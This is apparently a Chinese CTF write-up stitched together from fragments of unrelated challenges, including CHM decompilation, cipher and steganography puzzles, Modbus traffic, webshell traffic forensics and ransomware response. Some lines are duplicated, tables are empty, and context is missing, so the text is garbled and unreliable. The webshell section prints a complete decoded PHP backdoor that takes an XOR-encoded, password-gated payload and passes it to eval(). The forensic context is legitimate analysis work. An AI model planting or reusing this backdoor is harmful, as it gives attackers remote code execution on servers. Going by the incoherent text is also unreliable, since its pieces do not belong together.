Reverse - 3_idiots
CHM
chm 格式是 Windows 经过编译的帮助手册文件。用内置帮助浏览器打开会提示有不安全内容,于是进行解压:
hh -decompile ./output ./3_idiots.chm
chm 格式是 Windows 经过编译的帮助手册文件。用内置帮助浏览器打开会提示有不安全内容,于是进行解压:
hh -decompile ./output ./3_idiots.chm
题目信息
This challenge takes a few browser artifacts and leads you to the flag. The file below doesn't contain the flag itself, but it will tell you all you need to find it.
| Cipher | Puzzle |
|---|---|
密码使用的是 Magicode
UWSP Pointer Overflow CTF 是由威斯康星大学斯蒂文斯波因特分校 (The University of Wisconsin - Stevens Point and the Department of Computing and New Media Technologies) 的一个团队 (UWSP Pointers) 承办的 CTF 比赛,其题目难度适宜、面向新生、题材多样。该比赛在本系列文章的其他部分会被称作 POCTF (2025)。
每行末尾有数个空格与 Tab 组合,似乎在传达某种信息。
Flag 为 poctf{uwsp_5w337h34r7_15_7hy_c4ll}。
使用 Stegsolve 调一下通道,发现这张图藏了个二维码,但是依然难以辨认,没法直接被扫码工具识别,手动恢复会好一些:
这个流量包混杂了无用流量与其他地方的数据,因此需要先简单分析各个 IP 可能对应设备的用途:
题目要求找出关泵相关信息(从稍后放出的描述更新中得知 flag{0xtransaction_id_0xfunction_code_0xcoil_address}),具有明显的 Modbus 特征,因此过滤出这类协议的流量。过滤后的结果中多为读取操作,只有一条写操作出现:
一个 Webshell 流量包,有大量的 HTTP/TCP 流量记录,进行追踪(这里以最后一个流为例);攻击者使用 pass 传入经过 Base64 编码与反转的参数,解码后如下:
# 1qaz2wsx3edc=eu1uNDRjMzYyYjz+u2uwAH1mNsWC9MvudxUD4GxD2vZHYhmcslPc4AT6kvwn72TiprEftRcyZvWaASZ2twUSoSXCZHZrgXp1OrZJTzbT5eJdLiAUCd1+qUmpgl2Orlfucw+sWVNIRc8GzsXv8ODt4jV5jXn/LQCpCbmD2OihJd4HtL0BEOlzQGrMYUiFNRFgou2Zmus5JThj7ts0VATS5/BmZjQ=
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='1qaz2wsx3edc';
$payloadName='payload';
$key='0eff44c362b13fa2';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
很不巧,这次比赛正好卡上开学返校的点,无论从做题还是 Writeup 来说都有些匆忙;基本所有题目都是在火车上做的你敢信?!
附件分类
简单分析环境,发现被加密的文件扩展名均为 .LIVE,由此在应急响应网站上搜索,得到病毒家族为 Live。
其实从上个月开始平台就支持基于远程连接的靶机环境应急响应了,但是很可惜那天考试没能去做qwq
不过这次月赛给的题量也够大,爽赤😃👍
附件分类
附件分类
题目短小精悍,同时也不是太难,冲榜很大程度上靠手速(因此也是很惊险刺激hh)。